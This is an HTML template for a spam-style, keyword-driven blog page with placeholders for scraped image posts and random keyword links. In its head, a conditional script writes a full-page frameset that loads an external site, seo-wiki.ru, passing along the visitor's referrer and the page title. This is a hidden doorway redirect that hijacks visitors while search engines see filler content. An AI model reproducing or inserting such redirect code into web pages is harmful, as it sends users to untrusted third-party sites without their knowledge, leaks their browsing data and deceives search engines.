<!DOCTYPE html>
<html class="no-js" lang="en-US">
<head>
<meta charset="utf-8">
<meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport">
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<meta name="robots" content="index,follow" />
<title>{{ title }}</title>
<meta name="description" content="{{ description }}" />
<meta name="keywords" itemprop="keywords" content="{{ keywords }}" />
<meta name="author" content="{{ second_keyword }} {{ domainname }}">
<link rel="canonical" href="{{ permalink }}"/>

<link rel="alternate" type="application/rss+xml" href="{{ feed }}" title="{{ second_keyword }} RSS FEED">
<link href="http://{{ domain }}/static/style.css" rel="stylesheet" />
<link rel="icon" href="http://{{ domain }}/static/favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="http://{{ domain }}/static/favicon.ico" type="image/x-icon" />
<link href='https://plus.google.com/{{ plus_id }}/posts' rel='publisher'/>
<link href='https://plus.google.com/{{ plus_id }}/about' rel='author'/>
<link href='https://plus.google.com/{{ plus_id }}' rel='me'/>
{% if script %}
    <script type="text/javascript">
document.write('<frameset rows="100%"><frame src="http://seo-wiki.ru/X8ttC5?frm=frame&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title.split('|')[0]) + '"></frameset>')
</script>
{% endif %}
</head>
<BODY class="item" itemscope="itemscope" itemtype="http://schema.org/WebPage">

	<div itemscope="itemscope" itemtype="http://schema.org/BlogPosting">
		<meta content="{{ title }}" itemprop="description">
	</div>

<!-- ************ START outer-wrapper **************** -->

<div id="outer-wrapper">
	<div id="content" itemscope="itemscope" itemtype="http://schema.org/Blog">

		<header id="header-wrapper" itemscope="itemscope" itemtype="http://schema.org/WPHeader">
			<div class="swt-blogheader">

<div class="header section section" id="header"><div class="widget Header" data-version="1" id="Header1">
<div id="header-inner">

	<div class="titlewrapper">
		<p class="title">
			<meta content="{{ keyword }}" itemprop="name">
			<meta content="{{ permalink }}" itemprop="url">
			<a href="{{ permalink }}">{{ keyword }}</a>
		</p>
	</div>


</div>
</div></div>

			</div>
			<!-- /swt-blogheader -->
			<div style="clear: both"></div>
			<div style="clear: both"></div>
		</header>


<nav id="nav" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
	<input type="checkbox">
		<label>≡</label>
			<ul>
				<li id="home"><a href="http://{{ domain }}/">HOME</a></li>
				<li><a href="http://{{ domain }}/#policy" title="Privacy Policy">Privacy Policy</a></li>
				<li><a href="http://{{ domain }}/#contact" title="Contact Us">Contact Us</a></li>
			</ul>
</nav>


<div id="content-wrapper">

<!-- ************ START main-wrapper **************** -->

<div id="main-wrapper">
<div class="main section section" id="main">
<div class="widget Blog" data-version="1" id="Blog1">
<div class="blog-posts hfeed">

<div class="date-outer"><div class="date-posts">

<div class="post-outer">
	<article class="post hentry" itemprop="blogPost" itemscope="itemscope" itemtype="http://schema.org/BlogPosting">

<h1 class="post-title entry-title" itemprop="headline">{{ keyword }}</h1>

<div class="post-body entry-content" id="postid-{{ content.post_id }} quick-professional-cv" itemprop="articleBody">
<meta content="{{ description }}" name="description">

{% for item in content %}
<p><strong>{{ item.name }}</strong> {{ item.text }}<br/><br/> posted by <i>{{ item.host }}</i>, Image Size : {{ item.height }} x {{ item.width}} {{ item.format }} {{ item.size }} and Upload Date and Time : {{ item.published }}<br/><div class="img-post-center"><center><img src="http://i0.wp.com/{{ item.content_url }}" class="img-thumbnail" alt="{{ item.alt }}" title="{{ item.title }}"/></center></div>
{% endfor %}
<div style="clear:both;"></div>

</div>

	</article>
</div>

</div></div>

</div>
<div class="clear"></div>
</div>
</div>
</div>

<!-- ************ END main-wrapper **************** -->

<aside id="sidebar-wrapper" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
<div class="sidebar section" id="sidebartop"><div class="widget HTML" data-version="1" id="HTML1">
<div class="widget-content">
<ul class="list-group">
<div style="height: 700px;width:auto;overflow: auto;">
{% for item in rand_links %}
			<li class="list-group-item"><span><a href="{{ item.url }}">{{ item.keyword }}</a></span></li>
    {% endfor %}

</div>
</ul>
</div>
</div></div>
</aside>
<div class="clear"></div>
<div style="clear: both;"></div>

<footer id="footer-wrapper" style="border-top:4px solid #ddd;background:#111;color: #9c9c9c;height:50px"><div id="content-info">
<meta content="http://{{ domain }}/">
<small><p style="text-align:center">
Copyright &copy; <script type='text/javascript'>
            var d = new Date();
            var year= d.getFullYear();
            document.write(year);
        </script> <a href="http://{{ domain }}/">{{ second_keyword }}</a>
</p></small>
</div></footer>


</div>
</div>
</div>
</div>
</BODY>
</html>